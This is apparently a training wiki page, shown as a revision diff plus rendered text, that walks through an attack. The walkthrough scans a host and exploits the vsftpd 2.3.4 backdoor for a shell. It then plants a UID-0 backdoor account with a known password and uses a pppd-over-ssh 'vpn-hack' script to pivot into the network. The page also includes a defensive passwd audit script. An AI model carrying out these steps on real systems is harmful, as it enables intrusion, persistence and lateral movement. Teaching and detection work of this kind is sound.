Exemplary attack: Difference between revisions
| Zeile 1: | Zeile 1: | ||
| − | = | + | =Angreifer= |
| + | ==Scan== | ||
*nmap -sV 10.80.100.105 -p 21 | *nmap -sV 10.80.100.105 -p 21 | ||
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST | Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST | ||
| Zeile 8: | Zeile 9: | ||
21/tcp open ftp vsftpd 2.3.4 | 21/tcp open ftp vsftpd 2.3.4 | ||
Service Info: OS: Unix | Service Info: OS: Unix | ||
| − | =Nach Exploit googlen= | + | ==Nach Exploit googlen== |
;vsftpd 2.3 4 exploit-db | ;vsftpd 2.3 4 exploit-db | ||
| − | =Exploit finden= | + | ==Exploit finden== |
*https://www.exploit-db.com/exploits/49757 | *https://www.exploit-db.com/exploits/49757 | ||
| − | =Exploit ausführen= | + | ==Exploit ausführen== |
*python vsftp.py 10.80.100.105 | *python vsftp.py 10.80.100.105 | ||
Success, shell opened | Success, shell opened | ||
Send `exit` to quit shell | Send `exit` to quit shell | ||
| − | =Läuft ssh?= | + | =Opfer= |
| + | ==Läuft ssh?== | ||
*netstat -lntp | grep 22 | *netstat -lntp | grep 22 | ||
tcp6 0 0 :::22 :::* LISTEN 4360/sshd | tcp6 0 0 :::22 :::* LISTEN 4360/sshd | ||
| − | =User anlegen= | + | ==User anlegen== |
*useradd -m -o -u 0 -s /bin/bash -d /var/www www | *useradd -m -o -u 0 -s /bin/bash -d /var/www www | ||
*passwd www | *passwd www | ||
| Zeile 25: | Zeile 27: | ||
Retype new UNIX password: www2www | Retype new UNIX password: www2www | ||
passwd: password updated successfully | passwd: password updated successfully | ||
| − | |||
| − | |||
| − | |||
=VPN einrichten um Zugriff zum Netz zu erlangen= | =VPN einrichten um Zugriff zum Netz zu erlangen= | ||
*apt-get install ppp | *apt-get install ppp | ||
| − | =vpn-gateway= | + | =Angreifer= |
| + | ==vpn-gateway== | ||
*/usr/local/sbin/vpn-hack | */usr/local/sbin/vpn-hack | ||
<syntaxhighlight lang="bash"> | <syntaxhighlight lang="bash"> | ||
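Review bot: `=VPN einrichten um Zugriff zum Netz zu erlangen=` keeps its level-1 markup in this hunk while every other step heading was demoted to level 2, so the `apt-get install ppp` step falls out of the `=Opfer=` section and a step heading becomes a sibling of the role headings. Change it to `==VPN einrichten um Zugriff zum Netz zu erlangen==`. The `=Angreifer=` added here is also the second top-level heading with that text (the first is added at Zeile 1), so section links to it become ambiguous; a distinguishing title for one of them would avoid that.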
Revision as of 7 October 2021, 15:14
Attacker
Scan
- nmap -sV 10.80.100.105 -p 21
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST
Nmap scan report for 10.80.100.105
Host is up (0.00056s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
Service Info: OS: Unix
Google for an exploit
- vsftpd 2.3 4 exploit-db
Find the exploit
Run the exploit
- python vsftp.py 10.80.100.105
Success, shell opened
Send `exit` to quit shell
Victim
Is ssh running?
- netstat -lntp | grep 22
tcp6 0 0 :::22 :::* LISTEN 4360/sshd
Create a user
- useradd -m -o -u 0 -s /bin/bash -d /var/www www
- passwd www
Enter new UNIX password: www2www
Retype new UNIX password: www2www
passwd: password updated successfully
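From the defender's side, the account created in this step stands out in the passwd file because it shares UID 0 with root. The following audit is an added example, not part of the original wiki page; the function names and the sample entries are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a passwd-format file for accounts created the way the
# walkthrough does it (useradd -o -u 0). All sample entries are constructed.

# Print "name:home:shell" for every account other than root whose UID is 0.
find_uid0_clones() {
    awk -F: '
        /^[ \t]*(#|$)/ { next }                      # skip comments, blank lines
        $3 ~ /^0+$/ && $1 != "root" { print $1 ":" $6 ":" $7 }
    ' "$1"
}

# Print "uid:name1,name2" for every UID shared by several accounts
# (what useradd -o, "non-unique", permits).
find_duplicate_uids() {
    awk -F: '
        /^[ \t]*(#|$)/ { next }
        NF >= 3 {
            names[$3] = (names[$3] == "") ? $1 : (names[$3] "," $1)
            count[$3]++
        }
        END { for (u in count) if (count[u] > 1) print u ":" names[u] }
    ' "$1" | sort -n
}

# Report findings; return 0 only if the file is clean.
audit_passwd() {
    clones=$(find_uid0_clones "$1")
    dups=$(find_duplicate_uids "$1")
    [ -z "$clones" ] || printf 'UID 0 besides root: %s\n' "$clones"
    [ -z "$dups" ] || printf 'shared UID: %s\n' "$dups"
    [ -z "$clones$dups" ]
}

# Constructed sample: a small system plus the account from the walkthrough.
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
www:x:0:1001::/var/www:/bin/bash
EOF
}

sample=$(mktemp)
write_sample_passwd "$sample"
if audit_passwd "$sample"; then echo "clean"; else echo "review the accounts above"; fi
rm -f "$sample"
```

On a live host the same functions can be pointed at `/etc/passwd`; a non-zero return from `audit_passwd` is the signal to alert on.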
Set up a VPN to gain access to the network
- apt-get install ppp
Attacker
vpn-gateway
- /usr/local/sbin/vpn-hack
<syntaxhighlight lang="bash">
#!/bin/bash
LOG="/var/log/vpn-hack.log"
REMOTE_IP="/tmp/remote-ip"

vpn_hack () {
    # First three octets of the address stored in the trigger file
    OKT=$(cat $REMOTE_IP | cut -f 1-3 -d .)
    rm $REMOTE_IP
    LOCAL_NET=10.86.0.0/16
    REMOTE_NET=${OKT}.0/24
    ########
    PATH=/usr/local/sbin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/bin/X11/:
    ADD_SNAT="/sbin/iptables -t nat -A POSTROUTING -s $LOCAL_NET -j MASQUERADE -o eth0"
    FLUSH_SNAT="/sbin/iptables -t nat -F"
    date >> $LOG
    echo $OKT >> $LOG
    echo "Starting vpn to localhost -p 9922: " >> $LOG
    # PPP link carried over the ssh connection on localhost:9922
    pppd updetach noauth passive pty "ssh -P localhost -p 9922 -o Batchmode=yes pppd nodetach notty noauth" ipparam vpn 172.29.29.3:172.29.29.1 >> $LOG
    # Routes on both ends of the PPP link
    ssh -P localhost -p 9922 route add -net ${LOCAL_NET} gw 172.29.29.3 >> $LOG
    route add -net ${REMOTE_NET} gw 172.29.29.1 >> $LOG
    # Replace the NAT rules on the remote side
    ssh -P localhost -p 9922 ${FLUSH_SNAT} >> $LOG
    ssh -P localhost -p 9922 ${ADD_SNAT} >> $LOG
}

# Run only when the trigger file exists
if test -f $REMOTE_IP
then
    vpn_hack
fi
</syntaxhighlight>